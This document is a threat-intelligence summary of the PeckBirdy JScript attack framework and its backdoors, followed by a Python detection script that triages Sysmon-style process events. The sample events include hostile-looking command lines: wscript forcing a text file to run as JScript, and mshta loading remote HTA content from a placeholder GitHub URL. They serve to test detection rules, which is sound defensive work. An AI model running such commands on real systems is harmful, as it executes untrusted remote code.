Key points
- PeckBirdy is built entirely in JScript and uses Windows Script Host to run fileless commands.
- Runtime code injection leaves almost no on-disk footprint, which makes detection difficult.
- HOLODONUT and MKDOOR are modular backdoors used with PeckBirdy to maintain persistence and exfiltrate data.
- Trend Micro linked PeckBirdy to SHADOW-VOID-044 (stolen code-signing certificates, Cobalt Strike, CVE-2020-16040) and SHADOW-EARTH-045 (MSHTA and GitHub-hosted payloads).
- Investigators found tentative overlaps with suspected China-aligned groups such as Earth Lusca and Earth Baxia.
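The two delivery traits named above (JScript run through Windows Script Host, and MSHTA pulling GitHub-hosted payloads) both leave a trace in process-creation telemetry even when nothing is written to disk. The script below is an added illustration of how a defender might triage such events; it is not code from the report or from Trend Micro. The sample events are constructed records modelled on Sysmon Event ID 1 fields (image, command line, parent), and the three rules are generic heuristics (script-engine override, script host fed a non-script extension, mshta given a URL), not indicators specific to PeckBirdy.

```python
import re
from typing import Iterable

# Constructed sample process-creation events, modelled on Sysmon Event ID 1 fields.
# These are illustrative records written for this example, not telemetry from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe //E:JScript //B C:\Users\alice\AppData\Local\Temp\notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe https://raw.githubusercontent.com/example-org/example-repo/main/page.hta",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe //nologo C:\Scripts\backup.vbs",
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"image": r"C:\Program Files\ExampleApp\app.exe",
     "cmd": r"app.exe --check-update",
     "parent": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _script_args(cmd: str) -> list[str]:
    """Positional arguments of a script-host command line (host name and /switches dropped)."""
    parts = cmd.split()
    return [p for p in parts[1:] if not p.startswith("//") and not p.startswith("/")]


def check_event(ev: dict) -> list[str]:
    """Return the names of the detection rules the event matches (empty list if nothing fires)."""
    hits = []
    image = _basename(ev["image"])
    cmd = ev["cmd"]
    cmd_lower = cmd.lower()
    if image in SCRIPT_HOSTS:
        # Rule 1: //E: forces a file to be run as JScript/VBScript regardless of its extension.
        if re.search(r"//e:\s*(jscript|vbscript)", cmd_lower):
            hits.append("wsh_engine_override")
        # Rule 2: script host asked to run a file whose extension is not a normal script type.
        for arg in _script_args(cmd):
            name = _basename(arg)
            if "." in name and not name.endswith(SCRIPT_EXTS):
                hits.append("wsh_non_script_extension")
                break
    # Rule 3: mshta handed a URL, i.e. remote content rather than a local .hta file.
    if image == "mshta.exe" and re.search(r"https?://", cmd_lower):
        hits.append("mshta_remote_content")
    return hits


def triage(events: Iterable[dict]) -> list[dict]:
    """Run every rule over every event and return only the events that matched."""
    findings = []
    for ev in events:
        rules = check_event(ev)
        if rules:
            findings.append({"image": _basename(ev["image"]),
                             "rules": rules,
                             "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["image"], ",".join(finding["rules"]), "::", finding["cmd"])
```

Against the constructed sample, the wscript.exe event trips both script-host rules and the mshta.exe event trips the URL rule, while the scheduled cscript.exe backup job and the ordinary application update pass. Rules 1 and 2 will also fire on some legitimate administration scripts, so in practice they are better treated as enrichment that raises an alert's priority (together with parent process and signer) than as stand-alone blocking logic.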